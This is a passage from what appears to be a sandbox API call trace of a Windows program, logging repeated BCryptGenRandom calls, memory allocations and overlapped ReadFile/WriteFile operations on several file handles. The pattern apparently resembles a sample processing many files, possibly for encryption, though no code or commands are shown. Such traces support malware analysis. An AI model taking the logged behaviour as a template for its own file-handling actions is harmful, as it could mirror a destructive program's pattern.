lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.724] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.736] CloseHandle (hObject=0x3bc) returned 1 [0118.740] free (_Block=0x3e70008) [0118.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.748] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.748] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.748] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.749] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.749] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.749] free (_Block=0x3e305b8) [0118.749] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.749] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.749] free (_Block=0x77d8b8) [0118.749] free (_Block=0x2071c20) [0118.749] free (_Block=0x77d7a8) [0118.749] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.750] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.754] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x10cb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.755] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.774] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.774] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.774] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.774] free (_Block=0x3e305b8) [0118.774] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.775] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.775] free (_Block=0x77d8b8) [0118.775] free (_Block=0x2071c20) [0118.775] free (_Block=0x77d7a8) [0118.775] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.775] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.776] CloseHandle (hObject=0x308) returned 1 [0118.777] free (_Block=0x3df0008) [0118.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.778] CloseHandle (hObject=0x3bc) returned 1 [0118.780] free (_Block=0x1ff1e60) [0118.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.831] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.831] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.831] free (_Block=0x3e305b8) [0118.831] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.831] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.831] free (_Block=0x77d8b8) [0118.831] free (_Block=0x2071c20) [0118.831] free (_Block=0x77d7a8) [0118.831] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.843] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.844] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.844] free (_Block=0x3e305b8) [0118.844] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.844] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.844] free (_Block=0x77d8b8) [0118.844] free (_Block=0x2071c20) [0118.844] free (_Block=0x77d7a8) [0118.844] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.844] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.852] CloseHandle (hObject=0x3bc) returned 1 [0118.854] free (_Block=0x3df0008) [0118.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.864] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x738, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.878] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.878] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.878] free (_Block=0x3e305b8) [0118.878] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.878] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.879] free (_Block=0x77d8b8) [0118.879] free (_Block=0x2071c20) [0118.879] free (_Block=0x77d7a8) [0118.879] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.903] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.920] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.940] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.964] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x788, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.964] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.970] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x23d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.995] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.995] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.995] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.995] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.996] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.996] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.996] free (_Block=0x3e305b8) [0118.996] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.996] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.996] free (_Block=0x77d8b8) [0118.996] free (_Block=0x2071c20) [0118.996] free (_Block=0x77d7a8) [0118.996] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.996] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0119.005] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0119.006] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0119.008] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0119.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.529] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0120.529] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.529] CloseHandle (hObject=0x13c0) returned 1 [0120.531] free (_Block=0x3ef0008) [0120.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.544] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0120.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0120.546] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.546] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.546] free (_Block=0x3e305b8) [0120.546] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.546] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.546] free (_Block=0x77d8b8) [0120.546] free (_Block=0x2071c20) [0120.546] free (_Block=0x77d7a8) [0120.546] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0120.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0120.553] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.553] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.553] free (_Block=0x3e305b8) [0120.553] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.553] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.553] free (_Block=0x77d8b8) [0120.553] free (_Block=0x2071c20) [0120.553] free (_Block=0x77d7a8) [0120.553] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.560] CloseHandle (hObject=0x13c0) returned 1 [0120.561] free (_Block=0x3df0008) [0120.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0120.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0120.568] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.568] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.568] free (_Block=0x3e305b8) [0120.568] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.568] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.568] free (_Block=0x77d8b8) [0120.568] free (_Block=0x2071c20) [0120.568] free (_Block=0x77d7a8) [0120.568] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0120.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.581] CloseHandle (hObject=0x2f4) returned 1 [0120.581] free (_Block=0x3e70008) [0120.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0120.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0120.590] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.590] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.590] free (_Block=0x3e305b8) [0120.590] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.590] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.590] free (_Block=0x77d8b8) [0120.590] free (_Block=0x2071c20) [0120.590] free (_Block=0x77d7a8) [0120.590] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.590] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0120.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0120.599] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.599] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.599] free (_Block=0x3e305b8) [0120.599] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.599] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.600] free (_Block=0x77d8b8) [0120.600] free (_Block=0x2071c20) [0120.600] free (_Block=0x77d7a8) [0120.600] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0120.600] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, 